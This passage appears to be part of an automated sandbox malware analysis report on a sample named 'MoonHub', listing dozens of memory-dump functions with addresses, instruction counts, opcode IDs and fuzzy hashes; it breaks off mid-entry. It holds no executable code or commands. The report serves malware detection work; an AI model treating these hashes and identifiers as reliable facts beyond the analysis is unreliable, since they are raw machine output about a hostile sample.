                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fbf967704cef1c82b15ecd620ed9d26170989d95889be83c7fb9dc81831edd2e
                                                                                                                                                                                • Instruction ID: c4816dddc62f31265a986c28f93660413290e3bc996e652cbf9444a866ae0399
                                                                                                                                                                                • Opcode Fuzzy Hash: fbf967704cef1c82b15ecd620ed9d26170989d95889be83c7fb9dc81831edd2e
                                                                                                                                                                                • Instruction Fuzzy Hash: E4C11371A0CE4A5FD7A8EA2C9445AB673D1FFA5350F0442BED04EC3297DF38A8068795
                                                                                                                                                                                Function 00007FF848EC5CF0 Relevance: .4, Instructions: 395COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dd84cc82ca52e2954233f0ca32d17d993ed984e323bb8078d9e4779ffaf7e4a1
                                                                                                                                                                                • Instruction ID: 1ef5a2e6643c39b1ea19c1d80b4cd17f239601d41fd4a077caaa98c1932bfd84
                                                                                                                                                                                • Opcode Fuzzy Hash: dd84cc82ca52e2954233f0ca32d17d993ed984e323bb8078d9e4779ffaf7e4a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 22B17A30B1CA098FE6A8FB2C9458B7977D2FF99350F1441BAD04DC72A6DF29AC418785
                                                                                                                                                                                Function 00007FF848EA9710 Relevance: .4, Instructions: 381COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 602d57f2749ed36ae0f8cfa2baef6bdf4273036da057ec646521b80a64308387
                                                                                                                                                                                • Instruction ID: 89815837b8437e2f6c8138c0c16a8f803cb87fa0d98c49e3e3d3645d820a8f97
                                                                                                                                                                                • Opcode Fuzzy Hash: 602d57f2749ed36ae0f8cfa2baef6bdf4273036da057ec646521b80a64308387
                                                                                                                                                                                • Instruction Fuzzy Hash: EBB1D131A1CE0A8FEB99FB28D4556B973D2FF98750F440179D44EC7292DF38A8468B84
                                                                                                                                                                                Function 00007FF848EB0560 Relevance: .4, Instructions: 362COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 178b113289687f0b14dbeaf59c79c13759012fde237dd206a6875b0722b8e4b3
                                                                                                                                                                                • Instruction ID: ed4a2f33526563f03e462ee844d02293fb87fe0cacd7f07e96e21785275f3a50
                                                                                                                                                                                • Opcode Fuzzy Hash: 178b113289687f0b14dbeaf59c79c13759012fde237dd206a6875b0722b8e4b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CB14B62E0EAC24FE759F67D64151B56BE1FFE1250B0840FFC089CB4D7DD28A90A8359
                                                                                                                                                                                Function 00007FF848EAB998 Relevance: .4, Instructions: 352COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f7a1110457b554359ecaa39620cb5258de314f4482eaed5fa9dfc0e1468d1aed
                                                                                                                                                                                • Instruction ID: 165d883ff5c1aef2238fe980dfbf3b1432f50e3d73940d30d2e5baa2aa3908ce
                                                                                                                                                                                • Opcode Fuzzy Hash: f7a1110457b554359ecaa39620cb5258de314f4482eaed5fa9dfc0e1468d1aed
                                                                                                                                                                                • Instruction Fuzzy Hash: 54A15F20B0CA0B4FEAA8B62854953B923C2FFD57C5F540479D80DC72C6DF39AD8B9649
                                                                                                                                                                                Function 00007FF848EA445E Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8f66e86079080ce60e1685654a6d3f876dca36a8a45e7f98aefdb4ba2e829c02
                                                                                                                                                                                • Instruction ID: 77237b111b99b41b2207d89b7cd31a29609a7d913a74a025e54d61d8129366b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f66e86079080ce60e1685654a6d3f876dca36a8a45e7f98aefdb4ba2e829c02
                                                                                                                                                                                • Instruction Fuzzy Hash: FEC16230618A4E8FDBC8EF18C494AAA77E2FF98354F5445A9D41EC7296CB34EC42CB40
                                                                                                                                                                                Function 00007FF848EA3617 Relevance: .3, Instructions: 348COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7e459e9c4948eac31f4cdaa8db1790a2d743fdcf6f03d191c8ccfc7f2089dd10
                                                                                                                                                                                • Instruction ID: 9220039fce5fc5ed22f13a8d95ad299526f9ff0aa17302c91ca02fe10cce1af2
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e459e9c4948eac31f4cdaa8db1790a2d743fdcf6f03d191c8ccfc7f2089dd10
                                                                                                                                                                                • Instruction Fuzzy Hash: ECC11E34618A4E8FDBC8EF1CC494AAA73E2FF98744F5445A9D41EC7296CB35E852CB40
                                                                                                                                                                                Function 00007FF848EE22C8 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ffccb41a16e8b3fa87fdd7e218b236b27cbf0e60119614efc9dc3d9793449ad1
                                                                                                                                                                                • Instruction ID: 02aa249f24665d97f61031492b138ca3bec79c4e8dd025c729018b743ecc6fdf
                                                                                                                                                                                • Opcode Fuzzy Hash: ffccb41a16e8b3fa87fdd7e218b236b27cbf0e60119614efc9dc3d9793449ad1
                                                                                                                                                                                • Instruction Fuzzy Hash: 77C1613091CA4A8FEB94EA18C08077577E1FF94389F644579C44D87686DB3EF886C794
                                                                                                                                                                                Function 00007FF848E9F835 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eeb9bb971962b77650f48d56de8a3f736ba4fb2caf2b90acc252addc258b9c77
                                                                                                                                                                                • Instruction ID: e9a945d2ca026b9dfbaf04960b82b5cad26298984f983217ffbfff2af0ea0fb4
                                                                                                                                                                                • Opcode Fuzzy Hash: eeb9bb971962b77650f48d56de8a3f736ba4fb2caf2b90acc252addc258b9c77
                                                                                                                                                                                • Instruction Fuzzy Hash: 4DA17C31D0CA895FE765BBB898162F977E0FF46364F0501BAD84DC7193DE78A8068385
                                                                                                                                                                                Function 00007FF848EB0A18 Relevance: .3, Instructions: 325COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4c84006e3a72ef7f4448c9725fa54d995ded8015259c67c9f6ab570cbc506f06
                                                                                                                                                                                • Instruction ID: 295a95f6039e26aa15ed0145af32f8a4abf39bae701a771e2ecde63a3c7b47cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 4c84006e3a72ef7f4448c9725fa54d995ded8015259c67c9f6ab570cbc506f06
                                                                                                                                                                                • Instruction Fuzzy Hash: 85914531A1CB454FE758EB1C9C864B177E0FB96361F1401BED48AC32A2DB35B846C385
                                                                                                                                                                                Function 00007FF848E9D826 Relevance: .3, Instructions: 309COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6c55c407a578984cbbf8cba5022fe00eddf46280d2f403a265a924bdf84195fe
                                                                                                                                                                                • Instruction ID: 6616720ccc58ab60565f856f99abe3b9119fc315f5866ff0fe689e467737b047
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c55c407a578984cbbf8cba5022fe00eddf46280d2f403a265a924bdf84195fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 20C1AF74508A4E8FEBC5EF58C49C7A937E1FB68315F24457E981DCB296DB329892CB00
                                                                                                                                                                                Function 00007FF848E910A5 Relevance: .3, Instructions: 302COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 571b54b43f5f9808f81440d5779748ecd71e376ea82b88e336dcc459d7ef52ef
                                                                                                                                                                                • Instruction ID: 3c6c09453ad01fd25756affcfa317e0b9756236ea7cb720023c9298a7fff5209
                                                                                                                                                                                • Opcode Fuzzy Hash: 571b54b43f5f9808f81440d5779748ecd71e376ea82b88e336dcc459d7ef52ef
                                                                                                                                                                                • Instruction Fuzzy Hash: F0A1E331A0DA868FEB55FFA898112B977A1FF42398F0401BAD449871D7DF7EA801C355
                                                                                                                                                                                Function 00007FF848EA740C Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b78fd1af7d365cf10cbd518d5798d06a44fc1f34332dd2510d967b3fa456c647
                                                                                                                                                                                • Instruction ID: 8cb60c522a04172d3c00e13402cb3b6248cd305237b3ca935856f28d0de9720d
                                                                                                                                                                                • Opcode Fuzzy Hash: b78fd1af7d365cf10cbd518d5798d06a44fc1f34332dd2510d967b3fa456c647
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C81343280D78A4FE766EB749C151F57FE0FF86660F0801BAD488CB193DB29581AC792
                                                                                                                                                                                Function 00007FF848EA94FA Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 322eec19a252a2695b85cb2166ee5da81223052f8eedafa95e909c97241cce22
                                                                                                                                                                                • Instruction ID: 662a729e3580c8a309535605ec922053f32fd05e77658663bf20c586cf9c598e
                                                                                                                                                                                • Opcode Fuzzy Hash: 322eec19a252a2695b85cb2166ee5da81223052f8eedafa95e909c97241cce22
                                                                                                                                                                                • Instruction Fuzzy Hash: 26715772B0CA565FE319FB2DE4A11F57B90FF85368B0841B7D08DCB193DE24A8068398
                                                                                                                                                                                Function 00007FF848EE22E8 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 05ac0ef1d71747a4470740e1854065d0de982238362d48667ab95a249647f63f
                                                                                                                                                                                • Instruction ID: 8711be5a1c06b04fad66fb4142b34f46efc72a0045f997e6b81f6935d5206e55
                                                                                                                                                                                • Opcode Fuzzy Hash: 05ac0ef1d71747a4470740e1854065d0de982238362d48667ab95a249647f63f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A816F3061CA098FDB58EB18D484A72B3E1FB98354F24457DD05EC7696DA3AFC82CB94
                                                                                                                                                                                Function 00007FF848ED9AC8 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c05ee2be047f92b721cca91bf62a4d0256a658bfae360639aad1e43ffe159735
                                                                                                                                                                                • Instruction ID: be3e276dffcd5ffe763d474962a1f71f3c984ae32ae92a8a9b63758edf440953
                                                                                                                                                                                • Opcode Fuzzy Hash: c05ee2be047f92b721cca91bf62a4d0256a658bfae360639aad1e43ffe159735
                                                                                                                                                                                • Instruction Fuzzy Hash: 4571AF31A1CA068FE768EA18D441A71B3D2FB94354F24457DC48AC3696DF39F8868B44
                                                                                                                                                                                Function 00007FF848EE2228 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c89ad4d39755ba9e18bb5c77478bfa6b9740b91ba2727b6330f0d7c694fac9a7
                                                                                                                                                                                • Instruction ID: 1f81c76e1d98927ea4152bc737e96171ad753e1fe8161d74f3144c56fe2f8951
                                                                                                                                                                                • Opcode Fuzzy Hash: c89ad4d39755ba9e18bb5c77478bfa6b9740b91ba2727b6330f0d7c694fac9a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E71E171A1CE4A5FD7A8EB2C80456B677D1FBA5260F0445BED08FC3197DE39A4068391
                                                                                                                                                                                Function 00007FF848EA4617 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 20b007858ff24e1be82c72c4e2d26a05237af394f750122e9f5f9f48d0f65256
                                                                                                                                                                                • Instruction ID: 4a2947be46f439a459e388a763bd6a116529fabfa6ac5943e8367eae26201ed5
                                                                                                                                                                                • Opcode Fuzzy Hash: 20b007858ff24e1be82c72c4e2d26a05237af394f750122e9f5f9f48d0f65256
                                                                                                                                                                                • Instruction Fuzzy Hash: BB715732C0CB8A4FE765EB3898151F57BE1FF86794F0401BAE45CC7592DB38681A8791
                                                                                                                                                                                Function 00007FF848E97228 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1a7294a6eab066eaf1c9f052492da7f7965f0099f35f7a44e75cd9fdb465728c
                                                                                                                                                                                • Instruction ID: 1f2860d8aa44a3bc51d669cbd50268a857ffdfd58412db861069ff4cb99a6f84
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a7294a6eab066eaf1c9f052492da7f7965f0099f35f7a44e75cd9fdb465728c
                                                                                                                                                                                • Instruction Fuzzy Hash: A5813A3190DB8D8FE765FB24C8115EA7BE1FF96750F0402BAE45CC7192DE38690A8B85
                                                                                                                                                                                Function 00007FF848EAB725 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 813522091b35a2ec532fb7012df5218dac18f302a35060eb87768caf8b013553
                                                                                                                                                                                • Instruction ID: 65a6cd5226a776a578e9637a4f361d4db078a93540ef523faeb6b25280458ad0
                                                                                                                                                                                • Opcode Fuzzy Hash: 813522091b35a2ec532fb7012df5218dac18f302a35060eb87768caf8b013553
                                                                                                                                                                                • Instruction Fuzzy Hash: 61619230A0CA099FD788FB1CD849ABA77D1FF99350F1401BDE44EC72A6DE25AC428745
                                                                                                                                                                                Function 00007FF848EABAC8 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c04cc312285d04140a35e25ca7f7a32a6756642c519922e4854ad6ce057214c9
                                                                                                                                                                                • Instruction ID: 10e730f554e476e942eac99724a1d4a055e82bcde43bd8cf04efe06cd1129ae1
                                                                                                                                                                                • Opcode Fuzzy Hash: c04cc312285d04140a35e25ca7f7a32a6756642c519922e4854ad6ce057214c9
                                                                                                                                                                                • Instruction Fuzzy Hash: 61711130A0CB995FDB19BB2888519B57BE0FF85360F1401EED449C72A7CB29B842C795
                                                                                                                                                                                Function 00007FF848E953F2 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 04b4e86f8192ca7d02292ced32e4338caae2c966ea89f8d223d97c5e6ea8e7a9
                                                                                                                                                                                • Instruction ID: 51b5ae4a4a9a1795bde026f7eafb44ca1608e761d98d4890244168edcf64ff59
                                                                                                                                                                                • Opcode Fuzzy Hash: 04b4e86f8192ca7d02292ced32e4338caae2c966ea89f8d223d97c5e6ea8e7a9
                                                                                                                                                                                • Instruction Fuzzy Hash: 23611372D0CB5C4FE758EBACA8992E87BE1FF95351F0442BBD049C7252DA306845CB81
                                                                                                                                                                                Function 00007FF848EAB7A0 Relevance: .2, Instructions: 234COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cd49765a249abcb924113c6b0a58b8a7f54836aa8b122d1a2e120ad3acb6406b
                                                                                                                                                                                • Instruction ID: 2162ddec86341966716c89aa697f2548fb04b23637fb8b1f0335948257113ced
                                                                                                                                                                                • Opcode Fuzzy Hash: cd49765a249abcb924113c6b0a58b8a7f54836aa8b122d1a2e120ad3acb6406b
                                                                                                                                                                                • Instruction Fuzzy Hash: F1614E30A1C9499FDAA8FB2C8458B7A77E1FF59341F1400B9E44ECB2A6DF28EC458745
                                                                                                                                                                                Function 00007FF848E953A5 Relevance: .2, Instructions: 233COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 60e6b1f35787c795315350126cdd34c4d8534f95f996da0fba798ee208d23699
                                                                                                                                                                                • Instruction ID: 87ec2ee4d37c39b053b2848b62ba32cbb8e5f98e020b3a1dd36b5e46ca3ab8e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 60e6b1f35787c795315350126cdd34c4d8534f95f996da0fba798ee208d23699
                                                                                                                                                                                • Instruction Fuzzy Hash: 8B710E31D0CB988FDB58EBA898492FDBBE1FF95351F0441BBD44D87292CA746845CB82
                                                                                                                                                                                Function 00007FF848EA09EE Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eb62c889f559a72bbb05abb09bba6fcb77c62bd18054f158d494f7f40198ded7
                                                                                                                                                                                • Instruction ID: 1fa2a4623e6b1310b09d9ddc9f4cec92f92bd8cc1436c72e27d2e75eb9a0ffb2
                                                                                                                                                                                • Opcode Fuzzy Hash: eb62c889f559a72bbb05abb09bba6fcb77c62bd18054f158d494f7f40198ded7
                                                                                                                                                                                • Instruction Fuzzy Hash: DD718234A18A4E8FDB88FF18C494AAA73E1FFA8744F144668D41DC7296DB35EC46CB40
                                                                                                                                                                                Function 00007FF848EAB730 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dccda000c54ba6401c8876054b713ba954e06e6f72bb2aaf09e95a60957e25a5
                                                                                                                                                                                • Instruction ID: 50bb957bb846e76479b31daa4f21e218b2d5d728409cd43a2a28a65ee674c641
                                                                                                                                                                                • Opcode Fuzzy Hash: dccda000c54ba6401c8876054b713ba954e06e6f72bb2aaf09e95a60957e25a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 4251B931E1CE0B5FE658B61CA4451BA73C1FB987A0F18027ED84EC3296DE35B8474689
                                                                                                                                                                                Function 00007FF848EA3809 Relevance: .2, Instructions: 228COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
